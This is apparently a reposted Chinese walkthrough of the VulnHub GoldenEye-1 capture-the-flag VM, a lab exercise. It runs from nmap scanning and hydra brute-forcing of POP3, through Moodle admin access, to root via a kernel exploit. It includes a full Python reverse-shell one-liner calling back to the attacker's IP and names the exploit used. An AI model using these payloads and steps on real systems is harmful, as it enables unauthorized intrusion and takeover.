VulnHub-GoldenEye-1-Walkthrough

  • A+
所属分类:安全文章

一、靶机地址

1.https://www.vulnhub.com/entry/goldeneye-1,240/

2.下载镜像直接用VMware打开即可。

二、实验环境:

1.攻击机:kali  IP192.168.31.128

2.靶机:IP  192.168.31.132

三、要求:

1.拿到root权限找到flag.txt

四、复现

1、探测存活主机

2、使用命令:nmap  -sP  192.168.31.0/24

VulnHub-GoldenEye-1-Walkthrough

3、或者使用netdiscover获取目标IP地址

VulnHub-GoldenEye-1-Walkthrough

4、探测开放的端口

5、命令:nmap -sS -sV -A -p- 192.168.31.132

图片中开放了4个端口,尝试80端口

VulnHub-GoldenEye-1-Walkthrough 

6、访问80页面出现/sev-home/ to login 访问看看,会看到页面上需要身份验证,我们继续查看

VulnHub-GoldenEye-1-Walkthrough

VulnHub-GoldenEye-1-Walkthrough

7、在查看页面代码时 有个名为terminal.isJavaScript的文件 好奇访问了一下

VulnHub-GoldenEye-1-Walkthrough

8、出现个页面第一个红方块是访问/sev-home/出现的

英文不是很好第二个意思大概是这是编码是关于密码的编码

Boris 确保你更新默认密码

Natalya 说她能破解你的密码

VulnHub-GoldenEye-1-Walkthrough

9、这个编码是html编码所以网上搜索html解码:InvincibleHack3r

VulnHub-GoldenEye-1-Walkthrough

10、我们已经解码了密码:InvincibleHack3r,上面已经找到了有效的用户名,尝试下使用用户名密码登陆

VulnHub-GoldenEye-1-Walkthrough 

11、我们成功登陆GoldenEye应用程序,继续找有用的信息,通过这个标签我们知道pop3服务运行在某一默认端口,所以通过之前的nmap扫描端口知道pop35500655007其中一个挨个访问吧。

VulnHub-GoldenEye-1-Walkthrough

1255006被重置55007可以访问到。


VulnHub-GoldenEye-1-Walkthrough

VulnHub-GoldenEye-1-Walkthrough

13、回到分析“ terminal.jsHTML内容时用户名Boris 确保你更新默认密码,通过hydra暴力破解pop3服务

使用命令:echo -e natalyanboris> lj.txt(创建文本包含两个用户名)

hydra -L lj.txt -P /usr/share/wordlists/fasttrack.txt 192.168.31.132 -s 55007 pop3(以文本内容使用hydra攻击)成功爆破出来

用户:boris 密码:secret1!

用户:natalya 密码:bird

VulnHub-GoldenEye-1-WalkthroughVulnHub-GoldenEye-1-WalkthroughVulnHub-GoldenEye-1-Walkthrough

14、登录pop3服务使用Netcat实用程序通过pop3端口并使用用户“ borisnatalya”凭据登录到目标服务器邮箱中。

VulnHub-GoldenEye-1-Walkthrough

15、第一封邮件指出root用户没有扫描邮件的安全风险没有用。 

VulnHub-GoldenEye-1-Walkthrough

16、第二封邮件封来自用户“ natalya,称她可以破坏鲍里斯的密码。

VulnHub-GoldenEye-1-Walkthrough

17、第三封邮件可以看出有一份文件用了GoldenEye的访问代码作为附件进行发送,并保留在根目录中。但我们无法从此处阅读附件。现在使用natalya用户登录看看有什么有用的信息

VulnHub-GoldenEye-1-Walkthrough

18我们可以看到目标计算机上的root用户有一封电子邮件。让我们检查第二封电子邮件。

VulnHub-GoldenEye-1-Walkthrough

19在第二封邮件看到了另外一个用户名密码,此服务器域名和网站,还要求我们在本地服务hosts中添加域名信息:

用户名:xenia

密码:RCP90rulez!

域:severnaya-station.com

网址:severnaya-station.com/gnocertdir

我们根据邮件提示添加本地域名:severnaya-station.com

VulnHub-GoldenEye-1-Walkthrough

VulnHub-GoldenEye-1-Walkthrough

20在上面的屏幕截图中,我们可以看到URL已成功添加到目标计算机上。因此,让我们在浏览器中打开此URL

VulnHub-GoldenEye-1-Walkthrough

21、点击intro to GoldenEye需要输入账号密码在natalya第二封邮件有账号密码 我们尝试登录

登陆进来看了看,发现有一封邮件,内容发现用户名doak 继续使用hydra攻击

VulnHub-GoldenEye-1-Walkthrough

用户名:doak 

密码:goat

hydra已成功破解了用户doak的密码,使用账号密码继续登陆pop3邮件。

VulnHub-GoldenEye-1-Walkthrough

22邮件消息说,为我们提供了更多登录凭据以登录到应用程序。让我们尝试使用这些凭据登录。

用户名:dr_doak

密码:4England!

使用新的账户密码登录CMS

VulnHub-GoldenEye-1-Walkthrough 

23、点击Dr Doak将爆破出来的账号密码进行登录 

VulnHub-GoldenEye-1-Walkthrough

24、进来一看发现/dir007key/for-007.jpg

现在我们查看文件的内容,指出管理员凭据已隐藏在映像文件中,让我们在浏览器中打开图像以查看其内容。 

VulnHub-GoldenEye-1-Walkthrough

VulnHub-GoldenEye-1-Walkthrough

25、可以使用浏览器下载,也可以使用命令:wget http://severnaya-station.com/dir007key/for-007.jpg下载到本地。

根据邮件提示让我们检查图片内容,下载图片后,我们可以使用binwalk(路由逆向分析工具)、exiftool(图

虫)、strings(识别动态库版本指令)等查看jpg文件底层内容。

VulnHub-GoldenEye-1-Walkthrough

26exiftool解析得到Image Description : eFdpbnRlcjE5OTV4IQ==

显示的是base-64编码的字符串(两个等号表示它是base-64编码的字符串)。基数为64的编码字符串如下所示:

VulnHub-GoldenEye-1-Walkthrough 

27到网上搜索base-64编码解密,获得密码:xWinter1995x!

线索中说,这是管理员用户的密码。管理员用户身份继续登陆应用程序。

用户名:admin

密码:xWinter1995x!

VulnHub-GoldenEye-1-Walkthrough

28图片红框显示和我前面使用dr_doak用户登陆邮箱发现的结果一致,这是

Moodle使用的2.2.3版本,获得版本名称后,我搜索网上的可用漏洞,发现不行换一个方式

 

getshell

1由于我们已经使用了管理员admin用户登录页面,可以进行网站管理,在页面中找到了Site administration-Server- System paths

网站管理系统路径,发现可以上传代码使用Python代码,进行反弹shell

VulnHub-GoldenEye-1-Walkthrough

使用代码:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

使用python对本地1234端口上传一个shell,我们需要在本地开启端口1234

VulnHub-GoldenEye-1-Walkthrough

开启本地监听端口,回到管理员用户页面

VulnHub-GoldenEye-1-Walkthrough

VulnHub-GoldenEye-1-Walkthrough

需要找到一个能发送数据包出去的地方,这里找到了能发送邮件的地方,随意填写一些文字即可,点击Toggle 

spellchecker进行发送shell到本地。

VulnHub-GoldenEye-1-Walkthrough

获得了一个shell权限

使用python获得的shell权限后,得使用ptyhon获得pty,使用命令

python -c 'import pty; pty.spawn("/bin/bash")'

VulnHub-GoldenEye-1-Walkthrough

当我运行id命令时,它表明该用户不是root用户,这是www-data的低特权用户

 

提权

kali查找可用提权方式

使用命令:searchsploit ubuntu 3.13

VulnHub-GoldenEye-1-Walkthrough

找到kali中的文件,放到本地

VulnHub-GoldenEye-1-Walkthrough

VulnHub-GoldenEye-1-Walkthrough

由于前面说过靶机未安装gcc编译,只能用cc编译,需要修改37292.c编译。 

VulnHub-GoldenEye-1-Walkthrough

 Python开启服务 

VulnHub-GoldenEye-1-Walkthrough

VulnHub-GoldenEye-1-Walkthrough 

cc编译,赋予可执行权限后,运行exp

VulnHub-GoldenEye-1-Walkthrough

./exp 去执行

VulnHub-GoldenEye-1-Walkthrough

得到root权限&找到flag.txt

VulnHub-GoldenEye-1-Walkthrough

本文始发于微信公众号(LSCteam):VulnHub-GoldenEye-1-Walkthrough

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: